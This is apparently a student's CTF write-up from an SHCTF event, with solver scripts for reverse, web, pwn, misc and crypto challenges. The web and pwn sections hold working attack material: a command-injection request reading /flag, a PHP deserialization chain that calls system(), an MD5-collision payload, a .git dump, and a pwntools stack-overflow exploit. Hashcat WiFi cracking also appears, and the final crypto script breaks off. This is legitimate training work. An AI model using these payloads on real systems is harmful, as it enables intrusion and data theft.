re
gamegame
玩游戏也能签到??(本题的flag格式为:shctf{*})
数独,解就完事了,flag是填充的数
import copy
# Starting grid of the challenge; 0 marks a cell the player has to fill.
non_puzzle = [
    [5, 3, 0, 0, 7, 0, 0, 0, 0],
    [6, 0, 0, 1, 9, 5, 0, 0, 0],
    [0, 9, 8, 0, 0, 0, 0, 6, 0],
    [8, 0, 0, 0, 6, 0, 0, 0, 3],
    [4, 0, 0, 8, 0, 3, 0, 0, 1],
    [7, 0, 0, 0, 2, 0, 0, 0, 6],
    [0, 6, 0, 0, 0, 0, 2, 8, 0],
    [0, 0, 0, 4, 1, 9, 0, 0, 5],
    [0, 0, 0, 0, 8, 0, 0, 7, 9],
]
# Row-by-row copy: the solver mutates `puzzle` in place, while `non_puzzle`
# keeps the zeros that record which cells were originally blank.
puzzle = [list(row) for row in non_puzzle]
def is_valid_move(puzzle, row, col, num):
    """Return True when *num* can go at (row, col) without a Sudoku clash.

    The digit must not already appear in the same row, the same column, or
    the 3x3 box that contains the cell.
    """
    if num in puzzle[row]:
        return False
    if any(puzzle[r][col] == num for r in range(9)):
        return False
    # Top-left corner of the 3x3 box holding (row, col).
    box_top = row - row % 3
    box_left = col - col % 3
    for r in range(box_top, box_top + 3):
        for c in range(box_left, box_left + 3):
            if puzzle[r][c] == num:
                return False
    return True
def solve_sudoku(puzzle):
    """Fill *puzzle* in place by backtracking; return True once it is solved.

    Picks the first empty cell in row-major order, tries the digits 1-9 that
    is_valid_move() accepts, and recurses. A cell is reset to 0 when none of
    the remaining digits leads to a solution.
    """
    blank = next(
        ((r, c) for r in range(9) for c in range(9) if puzzle[r][c] == 0),
        None,
    )
    if blank is None:
        # No empty cell left: the grid is complete.
        return True
    r, c = blank
    for candidate in range(1, 10):
        if not is_valid_move(puzzle, r, c, candidate):
            continue
        puzzle[r][c] = candidate
        if solve_sudoku(puzzle):
            return True
        # Dead end further down: undo and try the next digit.
        puzzle[r][c] = 0
    return False
solve_sudoku(puzzle)
# The flag is the sequence of filled-in digits, read row by row: print a
# solved cell only where the original grid had a 0.
for given_row, solved_row in zip(non_puzzle, puzzle):
    for given, solved in zip(given_row, solved_row):
        if given == 0:
            print(solved, end="")
ezxor
又来做逆向拉,xor来咯。
enc
注意
strcpy(v10, "o");
是两字节,\0结尾
# Encoded bytes from the challenge; negative entries are presumably signed
# chars as shown by the decompiler, so each result is reduced modulo 256.
enc = [-61, 105, 114, -60, 103, 74, -24, 17, 67, -49, 111, 0, -13, 68, 110,
       -8, 89, 73, -24, 78, 94, -30, 83, 67, -79, 92]
# The XOR key repeats with period 3: index % 3 == 0 -> 0x90, 1 -> 0x21,
# 2 -> 0x31.
key_cycle = (0x90, 0x21, 0x31)
flag = "".join(
    chr((value ^ key_cycle[pos % 3]) % 256) for pos, value in enumerate(enc)
)
print(flag)
SHCTF{x0r_N0ce_hxxxoorrr!}
ezrc4
又到了新生们最最最最喜欢的rc4了!对称算法?好简单嘞!
v4数组enc,v5数组key,flag长度21
变种rc4,多异或了一个0x66
解密
ezapk
apk?秒啦 (flag格式为:SHCTF{*})
enc
key
加密过程
import base64
encoded_str = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
key = [12, 15, 25, 30, 36]
# The blob is base64 over UTF-8 text, so decode to str and work on code
# points rather than raw bytes.
enc = base64.b64decode(encoded_str).decode('utf-8')
# Per character: shift right by one, subtract 6, then XOR with the key entry
# at index (position mod 5).
flag = "".join(
    chr(((ord(ch) >> 1) - 6) ^ key[pos % len(key)])
    for pos, ch in enumerate(enc)
)
print(flag)
EzDBG
题目描述: 一句话的意义在听者的心里,常像一只陌生的猫到屋里来,声息全无,直到“喵~”的一叫,你才发觉它的存在。
[10.03-16:35] 已更新为降低难度的附件
尝试找到EzDBG模块中的main函数
导入pdb
.sympath <pdb目录>
找到main函数地址
查看汇编,简单异或
EzDBG!main:
00007ff6`d4f31a10 4055 push rbp
00007ff6`d4f31a12 57 push rdi
00007ff6`d4f31a13 4881ec58010000 sub rsp, 158h
00007ff6`d4f31a1a 488d6c2420 lea rbp, [rsp+20h]
00007ff6`d4f31a1f 488d7c2420 lea rdi, [rsp+20h]
00007ff6`d4f31a24 b91e000000 mov ecx, 1Eh
00007ff6`d4f31a29 b8cccccccc mov eax, 0CCCCCCCCh
00007ff6`d4f31a2e f3ab rep stos dword ptr [rdi]
00007ff6`d4f31a30 488b0509b60000 mov rax, qword ptr [EzDBG!__security_cookie{.value} (7ff6d4f3d040)]
00007ff6`d4f31a37 4833c5 xor rax, rbp
00007ff6`d4f31a3a 48898528010000 mov qword ptr [rbp+128h], rax
00007ff6`d4f31a41 488d0d1e060100 lea rcx, [EzDBG!__0BF6D801_EzDBG@cpp (7ff6d4f42066)]
00007ff6`d4f31a48 e837f9ffff call EzDBG!@ILT+895(__CheckForDebuggerJustMyCode) (7ff6d4f31384)
00007ff6`d4f31a4d 90 nop
00007ff6`d4f31a4e 488d5508 lea rdx, [inputStr{[0]} (rbp+8)]
00007ff6`d4f31a52 488d0dcb920000 lea rcx, [EzDBG!`string' (7ff6d4f3ad24)]
00007ff6`d4f31a59 e83df6ffff call EzDBG!@ILT+150(scanf) (7ff6d4f3109b)
00007ff6`d4f31a5e 90 nop
00007ff6`d4f31a5f c7455400000000 mov dword ptr [rbp+54h], 0
00007ff6`d4f31a66 eb08 jmp EzDBG!main+0x60 (7ff6d4f31a70)
00007ff6`d4f31a68 8b4554 mov eax, dword ptr [rbp+54h]
00007ff6`d4f31a6b ffc0 inc eax
00007ff6`d4f31a6d 894554 mov dword ptr [rbp+54h], eax
00007ff6`d4f31a70 837d5427 cmp dword ptr [rbp+54h], 27h
00007ff6`d4f31a74 7d32 jge EzDBG!main+0x98 (7ff6d4f31aa8)
00007ff6`d4f31a76 48634554 movsxd rax, dword ptr [rbp+54h]
00007ff6`d4f31a7a 488d0d7fb50000 lea rcx, [EzDBG!enc{[0]} (7ff6d4f3d000)]
00007ff6`d4f31a81 0fbe0401 movsx eax, byte ptr [rcx+rax]
00007ff6`d4f31a85 83f066 xor eax, 66h
00007ff6`d4f31a88 48634d54 movsxd rcx, dword ptr [rbp+54h]
00007ff6`d4f31a8c 0fbe4c0d08 movsx ecx, byte ptr inputStr{[0]} (rbp+8)[rcx]
00007ff6`d4f31a91 3bc1 cmp eax, ecx
00007ff6`d4f31a93 7411 je EzDBG!main+0x96 (7ff6d4f31aa6)
00007ff6`d4f31a95 488d0d8c920000 lea rcx, [EzDBG!`string' (7ff6d4f3ad28)]
00007ff6`d4f31a9c e803f7ffff call EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31aa1 90 nop
00007ff6`d4f31aa2 33c0 xor eax, eax
00007ff6`d4f31aa4 eb11 jmp EzDBG!main+0xa7 (7ff6d4f31ab7)
00007ff6`d4f31aa6 ebc0 jmp EzDBG!main+0x58 (7ff6d4f31a68)
00007ff6`d4f31aa8 488d0d91920000 lea rcx, [EzDBG!`string' (7ff6d4f3ad40)]
00007ff6`d4f31aaf e8f0f6ffff call EzDBG!@ILT+415(printf) (7ff6d4f311a4)
00007ff6`d4f31ab4 90 nop
00007ff6`d4f31ab5 33c0 xor eax, eax
00007ff6`d4f31ab7 488bf8 mov rdi, rax
00007ff6`d4f31aba 488d4de0 lea rcx, [rbp-20h]
00007ff6`d4f31abe 488d153b920000 lea rdx, [EzDBG!__xt_z[76] (7ff6d4f3ad00)]
00007ff6`d4f31ac5 e856f8ffff call EzDBG!@ILT+795(_RTC_CheckStackVars) (7ff6d4f31320)
00007ff6`d4f31aca 488bc7 mov rax, rdi
00007ff6`d4f31acd 488b8d28010000 mov rcx, qword ptr [rbp+128h]
00007ff6`d4f31ad4 4833cd xor rcx, rbp
00007ff6`d4f31ad7 e8e1f6ffff call EzDBG!@ILT+440(__security_check_cookie) (7ff6d4f311bd)
00007ff6`d4f31adc 488da538010000 lea rsp, [rbp+138h]
00007ff6`d4f31ae3 5f pop rdi
00007ff6`d4f31ae4 5d pop rbp
00007ff6`d4f31ae5 c3 ret
enc
解密脚本
# Ciphertext bytes (hex). 39 entries, matching the loop bound 27h in the
# disassembly of main.
ciphertext = [
    0x35, 0x2E, 0x25, 0x32, 0x20, 0x1D, 0x03, 0x5E, 0x07, 0x56, 0x00, 0x03,
    0x57, 0x57, 0x53, 0x50, 0x00, 0x54, 0x07, 0x00, 0x07, 0x07, 0x00, 0x03,
    0x50, 0x02, 0x51, 0x5E, 0x5E, 0x03, 0x5F, 0x02, 0x56, 0x03, 0x57, 0x00,
    0x50, 0x50, 0x1B,
]
# Single-byte XOR key (the `xor eax, 66h` in the comparison loop).
xor_key = 0x66
# Decryption helper
def decrypt(ciphertext, key):
    """XOR every value in *ciphertext* with *key* and return the result as text.

    *ciphertext* is an iterable of integers; each XORed value is turned into
    one character with chr().
    """
    chars = []
    for value in ciphertext:
        chars.append(chr(value ^ key))
    return ''.join(chars)
# Run the decryption over the embedded table and print the recovered text.
decrypted_message = decrypt(ciphertext, xor_key)
print("解密后的信息:", decrypted_message)
web
1zflask
题目描述: robots有什么用呢?
访问/s3recttt
,拿到源码
import os
import flask
from flask import Flask, request, send_from_directory, send_file
app = Flask(__name__)
@app.route('/api')
def api():
    """Run the shell command given in the ``SSHCTFF`` query parameter.

    NOTE(security): this is the weakness the challenge is built around. The
    parameter reaches os.popen() unchanged, so any client that can reach
    /api decides what the server's shell executes. A real service should not
    expose such an endpoint; where a fixed task is needed, run it with an
    argument list (subprocess.run([...], shell=False)) and keep request data
    out of the command line.
    """
    command = request.args.get('SSHCTFF', 'ls /')
    return os.popen(command).read()
@app.route('/robots.txt')
def static_from_root():
    """Serve robots.txt from the application's static folder."""
    # NOTE(review): robots.txt is world-readable by design; paths listed in
    # it are advertised, not hidden. Presumably this file is what points at
    # the source-download route -- its content is not shown here.
    static_dir = app.static_folder
    return send_from_directory(static_dir, 'robots.txt')
@app.route('/s3recttt')
def get_source():
    """Send this application's own source file (app.py) as a download.

    NOTE(security): an unauthenticated route that hands out server source
    gives away every other route and its logic; an obscure path name is not
    access control.
    """
    return send_file("app.py", as_attachment=True)
if __name__ == '__main__':
    # NOTE(security): debug=True enables Flask's debug mode (interactive
    # debugger and reloader). That is meant for local development only and
    # should be off on anything reachable by other users.
    app.run(debug=True)
/api?SSHCTFF=cat /flag
单身十八年的手速
题目描述: 点击就送flag
连点器
蛐蛐?蛐蛐!
题目描述: 尊敬的web手!请帮不想出题的fault蛐蛐某某某某,并将蛐蛐变为现实
<?php
// First gate: both tests use loose comparison (== / !=), so PHP's type
// juggling decides how the string parameter is compared with the integers.
// Values other than the exact string "114514" can therefore satisfy the
// first test; a strict comparison (===) against the expected string would
// not allow that.
if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
    if($_POST['ququ']!=null){
        $eval_param = $_POST['ququ'];
        // Only the first six bytes are compared; everything after the
        // prefix is still chosen by the client.
        if(strncmp($eval_param,'ququk1',6)===0){
            // NOTE(security): eval() executes the POST value as PHP code.
            // Request data must never reach eval(); a prefix check does not
            // make it safe.
            eval($_POST['ququ']);
        }else{
            echo("可以让fault的蛐蛐变成现实么\n");
        }
    }
    echo("蛐蛐成功第一步!\n");
}
else{
    echo("呜呜呜fault还是要出题");
}
$_GET['ququ'] == 114514
弱比较
MD5 Master
题目描述: 你是 MD5 大师吗?
<?php
// Shows this file's own source to every visitor.
highlight_file(__file__);
$master = "MD5 master!";
if(isset($_POST["master1"]) && isset($_POST["master2"])){
    // Both comparisons are strict, so type tricks do not apply: the branch is
    // taken only for two different byte strings that, with the fixed prefix
    // $master prepended, hash to the same MD5 digest.
    // NOTE(security): MD5 is not collision resistant, so equal digests must
    // not be treated as proof of equal inputs; use a current hash such as
    // SHA-256 where collision resistance matters.
    if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
        echo $master . "<br>";
        echo file_get_contents('/flag');
    }
}
else{
    die("master? <br>");
}
php编码
bp发包
master1=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%1Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%89%1F%96P%E9%3EV%EE%05%26N%E3%B4%06S%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3%C4%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%81%D9%D4N%E4&master2=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A1%FCi%C9q%01%D5%07%BA%5B6%5B%E6%D5r%3Dy%ED%21%9Dm%AD%3F%CDO%92%81%85z%B8%AC%13q%1D%A9%E0%DC%AC5%ED%EB%C7f%19%8E%09+%96P%E9%3EV%EE%05%26N%E3%B4%06%D3%ECYS%60%8CN%CA6co%D9%12%16x%FE9%1CMe%E3%7F%14%DC%B1%06%91%EDJ%86_%CCK_P%C5%C1%A8%CF%BC%29%12%8B%9A%DE%2A%95%E7%F8%A3D%60%F3%2B%F5%2Aa%F8%FE9%F6%88%A3%B1%01%D9%D4N%E4
ez_gittt
题目描述: 什么?竟然有人愿意把自己的秘密公开!!!???
直奔/.git
路由
githacker dump下/.git
githacker --url http://entry.shc.tf:44345/.git/ --output-folder result
查看日志
git log
git diff 554c928b2f67c9cd7d283706de161e6740c447a8
poppopop
题目描述: 简单的pop
源码
<?php
// Global state shared by the other classes through static properties.
class SH {
    // Set to true in T::__destruct(); read by SHCTF::__invoke().
    public static $Web = false;
    // Set to true in F::__toString(); not read anywhere in this listing.
    public static $SHCTF = false;
}
class C {
    // Holds whatever flag() will call.
    public $p;
    // Calls $this->p as a function. If $p is an object, PHP dispatches to its
    // __invoke() method.
    public function flag()
    {
        ($this->p)();
    }
}
class T{
    public $n;
    // Runs automatically when the object is destroyed, including objects
    // created by unserialize().
    public function __destruct()
    {
        SH::$Web = true;
        // echo converts $n to a string; when $n is an object this calls its
        // __toString() method.
        echo $this->n;
    }
}
class F {
    public $o;
    // Invoked whenever the object is used as a string. Besides returning
    // text it has a side effect: it calls flag() on whatever $o holds.
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
class SHCTF {
    public $isyou;
    public $flag;
    // Invoked when the object is called like a function.
    public function __invoke()
    {
        if (SH::$Web) {
            // NOTE(security): the function name ($isyou) and its argument
            // ($flag) both come from object properties. On an object built by
            // unserialize() from request data, both are chosen by the client.
            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}
if (isset($_GET['data'])) {
    highlight_file(__FILE__);
    // NOTE(security): unserialize() on request data lets the client create
    // objects of any loaded class with property values of its choosing; the
    // magic methods of those classes (__destruct, __toString, __invoke) then
    // run on that object graph. Exchange data as JSON (json_decode) instead,
    // or pass ['allowed_classes' => false] as the second argument.
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
    echo "小丑离我远点!!!";
}
梭哈
<?php
class SH {
public static $Web = false;
public static $SHCTF = false;
}
class C {
public $p;
public function flag()
{
($this->p)();
}
}
class T{
public $n;
public function __destruct()
{
SH::$Web = true;
echo $this->n;
}
}
class F {
public $o;
public function __toString()
{
SH::$SHCTF = true;
$this->o->flag();
return "其实。。。。,";
}
}
class SHCTF {
public $isyou;
public $flag;
public function __invoke()
{
if (SH::$Web) {
($this->isyou)($this->flag);
echo "小丑竟是我自己呜呜呜~";
} else {
echo "小丑别看了!";
}
}
}
$a=new SHCTF();
$a->isyou='system';
$a->flag='cat /flllag';
$b=new C();
$b->p=$a;
$c=new F();
$c->o=$b;
$d=new T();
$d->n=$c;
echo base64_encode(serialize($d));
GET传参
jvav
题目描述: vavj
梭
import java.io.*;
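public class demo {
    /**
     * Runs {@code sh -c "cat /flag"} and copies the child's standard output
     * to this process's standard output, one line at a time.
     *
     * I/O failures and interruption while waiting are reported with a stack
     * trace, as before.
     */
    public static void main(String[] args) {
        try {
            ProcessBuilder builder = new ProcessBuilder("sh", "-c", "cat /flag");
            Process process = builder.start();
            // try-with-resources closes the reader (and the pipe under it)
            // even when readLine() throws; the original never closed it.
            try (BufferedReader reader =
                    new BufferedReader(new InputStreamReader(process.getInputStream()))) {
                String line;
                while ((line = reader.readLine()) != null) {
                    System.out.println(line);
                }
            }
            process.waitFor();
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
    }
}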
pwn
签个到吧
题目描述: close nc
过滤,1s执行
No stack overflow1
题目描述: stack overflow? 我写了一个简单的checker来判断是否存在栈溢出,这个checker是否合理??
strlen,\x00绕过
from pwn import*
p=remote("entry.shc.tf",21687)
# Consume the service's first line before sending anything.
p.recvline()
# Address hard-coded from the challenge binary -- presumably the routine that
# spawns a shell; confirm against the disassembly.
shelladrress=0x4011DE
# The filler is NUL bytes. The write-up attributes the bypass to a strlen()
# based checker: strlen() stops at the first NUL, so it reports a short
# length however many bytes were actually read. A length check has to use
# the byte count returned by the read call, not strlen().
payload=b'\x00'*0x117+p64(shelladrress)
p.sendline(payload)
p.interactive()
misc
真真假假?遮遮掩掩!
题目描述: 假的就是假的,真的就是真的,遮遮掩掩的有什么用!
题目名提示伪加密,标志位改0
打不开flag.txt,还有加密
如下注释给了密码提示
爆破密码SHCTF202410FTCHS
SHCTF{C0ngr@tu1at1ons_On_Mast3r1ng_mAsk_aTT@ck5!}
拜师之旅①
题目描述: 一年一度的洛琪希美照大赏开始了,正好Nanian233下周要去拜师pngMaster, 参加入门考试. 就拿这个先练练手吧
缺png头
改宽高
import zlib
import struct
import binascii
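file = 'roxy.png'
# Read the whole image once; the context manager closes the handle.
with open(file, 'rb') as src:
    fr = src.read()
# Bytes 12..28 are the IHDR chunk type plus its 13 data bytes, which is the
# span the chunk CRC stored at bytes 29..32 is computed over.
data = bytearray(fr[12:29])
crc32key = struct.unpack('>I', fr[29:33])[0]
print(crc32key)
# Search every width/height below n for the pair whose IHDR CRC matches the
# stored one, then write a copy of the image with those dimensions.
n = 4096
for w in range(n):
    width = struct.pack('>i', w)
    data[4:8] = width
    for h in range(n):
        height = struct.pack('>i', h)
        data[8:12] = height
        if zlib.crc32(data) != crc32key:
            continue
        print(crc32key)
        print(bytearray(width), bytearray(height))
        print(data)
        newpic = bytearray(fr)
        # Width and height sit at file offsets 16 and 20.
        newpic[16:20] = width
        newpic[20:24] = height
        # The original ended with `fw.close` (no call), so the output file
        # was never closed explicitly; `with` flushes and closes it.
        with open(file + '.png', 'wb') as fw:
            fw.write(newpic)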
有WiFi干嘛不用呢?
题目描述: k1每次来陪睡都要连WiFi,请帮他获取该wifi密码。flag提交方式:SHCTF{WiFi密码}。
前段时间做moectf的re题正好遇到wifi流量破解
这题给了may文件夹,看文件名和文件内容大概率是密码
提取一下
import os
folder_path = r'./may'
output_file = 'passwd.txt'
# Build a candidate word list: for every regular file in the folder, write
# its name on one line and a slice of its content on the next.
with open(output_file, 'w', encoding='utf-8') as wordlist:
    for entry in os.listdir(folder_path):
        candidate_path = os.path.join(folder_path, entry)
        if not os.path.isfile(candidate_path):
            continue
        wordlist.write(f'{entry}\n')
        with open(candidate_path, 'r', encoding='utf-8') as src:
            body = src.read()
        # Drops the first character and the last two -- presumably a wrapper
        # around the value in these files; confirm against a sample file.
        wordlist.write(f'{body[1:-2]}\n')
hashcat hcxpcapngtool - advanced password recovery转一下
字典爆破
./hashcat -m 22000 -a 0 2165215_1728068768.hc22000 passwd.txt
Rasterizing Traffic
题目描述: Man! What can I say!!!
分析流量包,也就一个png比较明显了
导出,多余删掉
光栅
from PIL import Image
import numpy as np
# Produce five masked copies of the image, one per horizontal offset.
for j in range(5):
    img = Image.open('.png').convert('L')
    width, height = img.size
    img_data = np.array(img)
    interval = 5
    first_col = 1 + j
    # In every period of `interval` columns, zero out interval - 1 of them
    # starting at the current offset.
    for left in range(first_col, width, interval):
        img_data[:, left:left + interval - 1] = 0
    masked = Image.fromarray(img_data)
    masked.save(f'./ouput/{j}.png')
SHCTF{1111z_tr@ff1c_aNaLys13}
crypto
EzAES
题目描述: 最最简单的AES
源码
from Crypto.Cipher import AES
import os
# Fresh random 16-byte IV and 16-byte (AES-128) key for this run.
iv = os.urandom(16)
key = os.urandom(16)
my_aes = AES.new(key, AES.MODE_CBC, iv)
flag = open('flag.txt', 'rb').read()
# Pads with spaces up to the next 16-byte boundary (a full extra block when
# the length is already a multiple of 16). Unlike PKCS#7, this padding cannot
# be told apart from trailing spaces in the data itself.
flag += (16 - len(flag) % 16) * b' '
c = my_aes.encrypt(flag)
print(c)
print(iv)
# NOTE(security): the key is printed next to the ciphertext and IV, so anyone
# holding this output can decrypt it. The cipher gives no protection once the
# key travels with the data.
print(key)
'''
b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'
b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'
b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'
解密
from Crypto.Cipher import AES
key = b'J\x18\xe9\xba\xcb\xe6\xd8\x88\x02\x8d\x07-\xc7\xe8F\xa7'
iv = b'h\x7f\xccv\x06\xbc\xb4L\xb5^\x1a\x88\xfe\xc6l\xaf'
my_aes_decrypt = AES.new(key, AES.MODE_CBC, iv)
ciphertext = b'\xa0\t\xb10\xab\t<gP&\x8d&\xb2\x105m\xe3`w:\x84\x08;K\xbfX_\x11h5+\xcf\x05\xbb}&\t \xf3\xa5\xb8\xd5\xdd\x89!\x02\xcf\xb9'
plaintext = my_aes_decrypt.decrypt(ciphertext)
plaintext = plaintext.rstrip(b' ')
print(plaintext)
Hello Crypto
题目描述: 你好,现代密码学
源码
from Crypto.Util.number import bytes_to_long
from secret import flag
m = bytes_to_long(flag)
print("m =",m)
# In cryptography, m stands for message, also plaintext
# so, why this m is number?
# decrypt this Message to get flag!
# m = 215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781
我真的哭死,第一次遇到能让我不用ai直接手搓出来的题呜呜呜
解密脚本
from Crypto.Util.number import*
m=215055650564999214432481721620349452516367651612295625381708787088204454685371266924568980362304524002411951928009876326781
flag=long_to_bytes(m)
print(flag)
factor
factor and combination
yafu分解
.\yafu-x64.exe "factor(202684025069666122928943870473693390943999154246475102682928603649889979837891808145761938294210543968287387118675294961417296597826107898446066891091139992043145111792866874820404982180534411)"
gpt梭哈
from itertools import combinations
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long
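# Prime factors of N (obtained by factoring N)
prime_list = [
    18382585067038096651,
    14840413069428752761,
    9845968710564320221,
    11985382012119355663,
    16974023387369024819,
    15073937162523269353,
    15879874287378916289,
    12489385236654944237,
    11580488510409206699,
    10713468965251790263
]
# Given ciphertext and public exponent e
c = 74957645771347063156084390560511541272461735783664273246902636936377661944639588841276568374009308588456113421628518882519406151899764
e = 65537
# The script assumes the RSA modulus is the product of 7 of the 10 factors,
# so it tries every 7-element subset until the plaintext looks like a flag.
for p_list in combinations(prime_list, 7):
    # The primes are distinct, so phi(n) is the product of (p - 1).
    n = 1
    phi_n = 1
    for p in p_list:
        n *= p
        phi_n *= p - 1
    try:
        # inverse() now sits inside the try: a subset for which e has no
        # inverse modulo phi(n) is skipped instead of aborting the search
        # (the original only guarded pow() and long_to_bytes()).
        d = inverse(e, phi_n)
        m = pow(c, d, n)
        flag = long_to_bytes(m)
    except ValueError:
        continue
    if b'CTF{' in flag:  # accept the subset whose plaintext has the flag marker
        print(f"解密成功: {flag}")
        break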
baby_mod
题目描述: 模 = mod
题目源码
from Crypto.Util.number import *
from enc import flag
m = bytes_to_long(flag)
# RSA primes (secret).
p = getPrime(512)
q = getPrime(512)
# Two 777-bit primes that are printed below, and a 15-bit prime that is not.
r = getPrime(777)
t = getPrime(777)
tmp = getPrime(15)
e = 65537
n = p*q
# Only c, leak, r and t are printed; n itself is never shown.
print(f"c = {pow(m,e,n)}")
# NOTE(security): leak is an integer linear combination of the secret primes
# with published coefficients (r, t) and a small unknown offset (tmp). A
# relation like this with short unknowns is what lattice reduction is good at
# recovering, so it should be treated as disclosing p and q.
print(f"leak = {p*r-q*t-tmp}")
print(f"r = {r}")
print(f"t = {t}")
'''
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
'''
搜p*r-q*t-tmp
搜到SRCTF2024-baby极为相似
找了几位师傅的脚本试了试,最后利用了DexterJie师傅的脚本SRCTF | DexterJie’Blog
正负都没改,直接替换了值,竟然能直接出结果,虽然不理解,但极为震撼
from Crypto.Util.number import *
c = -69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
r = 509697404737948720046406687520150366613156768703980116749346442711408241188987388435217685683965064030163545148763100550233559352827738330807048400676399434320247004442122933630140846255731758799444023237982890267905764761757348003147
t = 463126834475126572445695865060993926686649063526279343315054983870136945882510369423524699878308778808630925584398965484180299860685560160651010891974529641405706327161582223348457941305703650468079611799387806742840930431343849680317
Ge = Matrix(ZZ,[
[leak,0,0,0],
[r,1,0,0],
[t,0,1,0],
[-1,0,0,2^500]
])
Ge[:,0] *= 2^2000
for line in Ge.LLL():
if line[0] == 0:
p,q = abs(line[1]),abs(line[2])
n = p * q
d = inverse(65537,(p-1)*(q-1))
m = pow(c,d,n)
print(long_to_bytes(m))
# SRCTF{0896649c53c145919ce741f180957834}
有意思的是,另一位师傅的代码最后也跑出来了
import itertools
def small_roots(f, bounds, m=1, d=None):  # multivariate Coppersmith
    """Search for small roots of the polynomial *f* over its modular base ring.

    This is Sage code (``^`` is exponentiation after Sage's preparser).

    f:      polynomial over a ring whose cardinality N is used as the modulus.
    bounds: one upper bound per variable of f; used to scale lattice columns.
    m:      highest power of f used when building shifted polynomials.
    d:      exclusive upper limit on the exponent of each variable in the
            monomial shifts; defaults to f.degree().

    Returns a list of root tuples (one entry per variable, as elements of the
    base ring), or an empty list when no zero-dimensional ideal is reached.
    """
    if not d:
        d = f.degree()
    R = f.base_ring()
    N = R.cardinality()
    # Normalise by the first entry of f.coefficients(), then lift to ZZ.
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)
    G = Sequence([], f.parent())
    # Shifted polynomials: N^(m-i) * f^i times every monomial whose exponents
    # are all below d.
    for i in range(m + 1):
        base = N ^ (m - i) * f ^ i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)
    # Scale each column by its monomial evaluated at the bounds before LLL,
    # and undo the scaling afterwards.
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)
    B = B.dense_matrix().LLL()
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)
    H = Sequence([], f.parent().change_ring(QQ))
    # Add the reduced polynomials one at a time until the ideal they generate
    # has dimension 0, then read the integer roots off its variety.
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            # The last polynomial made the system inconsistent; drop it.
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots
    return []
c = 69388337910926342681090965800884154923274667505929366017395075301839584042757378255073468135975740083027272129960305510582826591778899739737139123876075309052155413583210989061114017880692246227324644635049250706378414255798005837813835884361543956289640913919906219034822228294392164201878764550106686378446
leak = 2345780339913649202864882522709983690083061387873806192946692416975906070069063306198956829246427222897128978164341671404381681465613263261154828284776539820970992533590757164330161778045400984079316842311775002964366831992419349232813490190768689522417831084197257711322166999166839203593959011077523264018333087188935983276994626533641509138224511196580985638081307516654318475924632465
